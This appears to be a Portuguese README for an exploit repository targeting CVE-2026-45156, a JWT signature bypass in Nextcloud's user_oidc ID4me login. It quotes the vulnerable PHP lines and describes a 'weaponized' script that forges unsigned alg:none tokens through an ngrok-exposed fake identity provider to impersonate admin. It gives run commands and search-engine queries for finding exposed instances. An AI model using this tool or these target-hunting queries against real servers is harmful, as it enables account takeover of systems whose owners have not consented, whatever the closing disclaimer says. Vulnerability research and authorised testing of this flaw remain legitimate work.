
Este repositório contém o script de exploração de Prova de Conceito (PoC) para CVE-2026-45156
user_oidc ID4me Bypass de Assinatura JWTProva de Conceito (PoC) Totalmente Automatizada para Tomada de Admin.
Por trás de cada CVE, há uma história. Esta foi encontrada às 2 da manhã em uma noite fria de inverno, alimentada por uma playlist de término de relacionamento em loop. Leia o mergulho técnico completo, a montanha-russa emocional e as lições aprendidas sobre confiança zero:
🔗 Leia o Post Completo do Blog Aqui (Link do seu post no blog)
Ao processar tokens JWT recebidos de provedores de identidade ID4me, o aplicativo user_oidc do Nextcloud processa o payload do token usando base64_decode() sem verificar a assinatura criptográfica.
// Lines 248 - 252
[$header, $payload, $signature] = explode('.', $data['id_token']);
$plainHeaders = json_decode(base64_decode($header), true);
$plainPayload = json_decode(base64_decode($payload), true);
/** TODO: VALIATE SIGNATURE! */
$user = $this->manager->getOrCreate($plainPayload['sub'], ...);
alg: nonenextcloud_id4me_poc.py é um framework totalmente automatizado e armado.
alg: none em tempo real.pyngrok.# 1. Install dependencies
pip install requests pyngrok
# 2. Add your free Ngrok auth token
ngrok config add-authtoken <YOUR_NGROK_TOKEN>
python nextcloud_id4me_poc.py <TARGET_URL> [--user <USERNAME>] [--port <PORT>]
| Argumento | Descrição | Padrão |
|---|---|---|
<TARGET_URL> | A instância Nextcloud vulnerável | Obrigatório |
--user | Nome de usuário a personificar | admin |
--port | Porta local para o servidor OIDC falso | 9999 |
python nextcloud_id4me_poc.py https://target.lab --user admin
(Você verá um banner hacker glitch inicializar, seguido pelo fluxo automatizado de exploração e um relatório final de vulnerabilidade.)
Para identificar instâncias Nextcloud potencialmente vulneráveis que possuem o aplicativo user_oidc instalado:
title:"Nextcloud" http.html:"user_oidc"
title:"Nextcloud" http.html:"id4me"
http.title:"Nextcloud" http.html:"/apps/user_oidc/"
Nota: Ter o aplicativo instalado não significa automaticamente que o alvo é vulnerável.
Esta PoC é fornecida APENAS PARA FINS EDUCACIONAIS E DE TESTES DE SEGURANÇA AUTORIZADOS.
Este script é destinado a pesquisadores de segurança e caçadores de bugs para testar sistemas dos quais têm permissão explícita para auditar. Qualquer uso não autorizado desta ferramenta contra sistemas que você não possui ou que não tenha permissão explícita e documentada para testar é estritamente proibido e pode violar leis locais, estaduais e federais.
O autor (CyberTechAjju) não assume nenhuma responsabilidade e não se responsabiliza por qualquer uso indevido ou dano causado por este programa.